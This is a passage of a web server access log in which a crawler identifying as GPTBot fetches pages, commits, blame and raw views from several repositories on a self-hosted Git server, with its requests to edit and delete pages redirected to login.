"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages%2finstrument.png" [Client 74.7.227.38] [Length 19814] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" +[17/Feb/2026:14:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" [Client 74.7.227.38] [Length 10635] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:14:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 16303] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72020] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11305] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:14:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" +[17/Feb/2026:14:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" +[17/Feb/2026:14:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11598] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" +[17/Feb/2026:14:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" +[17/Feb/2026:14:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" +[17/Feb/2026:14:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23928] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:14:50:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:14:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/mail_contact.py" +[17/Feb/2026:14:50:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:14:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11568] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:14:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11132] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:14:50:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:14:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10503] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:14:50:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:14:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/mail_contact.py" +[17/Feb/2026:14:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" [Client 74.7.227.38] [Length 10146] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:14:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71398] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" +[17/Feb/2026:14:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" +[17/Feb/2026:14:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" +[17/Feb/2026:14:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 9884] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" +[17/Feb/2026:14:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10661] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:14:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9941] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:14:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:14:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481684] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" +[17/Feb/2026:14:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659891] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" +[17/Feb/2026:14:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" +[17/Feb/2026:14:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10042] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:14:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:14:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" +[17/Feb/2026:14:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10699] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" +[17/Feb/2026:14:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" +[17/Feb/2026:14:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" +[17/Feb/2026:14:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" +[17/Feb/2026:14:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" +[17/Feb/2026:14:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" [Client 74.7.227.38] [Length 10720] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:14:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9929] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:14:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 10046] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 